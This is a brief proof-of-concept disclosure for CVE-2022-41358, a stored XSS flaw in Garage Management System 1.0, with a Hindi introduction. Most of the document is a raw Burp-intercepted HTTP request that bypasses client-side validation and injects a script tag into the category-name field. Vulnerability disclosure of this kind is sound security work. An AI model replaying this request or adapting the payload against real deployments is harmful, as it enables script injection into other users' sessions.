
CVE-2022-41358 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो Garage Management System 1.0 में संग्रहीत XSS प्रदर्शित करता है, बर्प सुइट अनुरोध छेड़छाड़ के माध्यम से क्लाइंट-साइड सत्यापन को बायपास करने के लिए।
गैराज प्रबंधन प्रणाली XSS को रोकने के लिए क्लाइंट-साइड सत्यापन का उपयोग करती है। Burp का उपयोग करके, एक अनुरोध को संशोधित करके सर्वर पर पुनः भेजा जा सकता है, इस सत्यापन को दरकिनार करते हुए, जो XSS के लिए एक मार्ग बनाता है।





Parameter: categoriesName
URI: /garage/php_action/createCategories.php
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"
<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"
1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"
------WebKitFormBoundaryqKDsN4gmatTEEkhS--
